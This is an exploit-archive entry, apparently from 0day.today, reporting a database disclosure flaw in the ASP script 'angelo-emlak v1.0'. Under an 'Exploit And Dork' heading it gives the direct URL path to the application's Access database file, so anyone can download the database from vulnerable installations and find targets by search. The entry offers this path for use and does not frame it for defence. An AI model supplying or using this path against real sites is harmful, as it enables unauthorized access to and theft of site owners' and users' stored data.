id: 10359
date: 12/21/2009
title: Angelo-emlak v1.0 Database Disclosure Vulnerability
author: LionTurk
cves: 

===================================================
Angelo-emlak v1.0 Database Disclosure Vulnerability
===================================================

============================================================================== 
 
    
 
    [»] Script:             [  angelo-emlak v1.0   ] 
 
    [»] Language:           [ ASP ] 
 
    
 
########################################################################### 
 
    
 
===[ Exploit And Dork  ]=== 
 
    
 
    [»] http://[target].com/[path]/veribaze/angelo.mdb
 
  
 
 
   [»] ( c ) DesignAndCodeBy:Angelo

###########################################################################



#  0day.today [2023-03-22]  #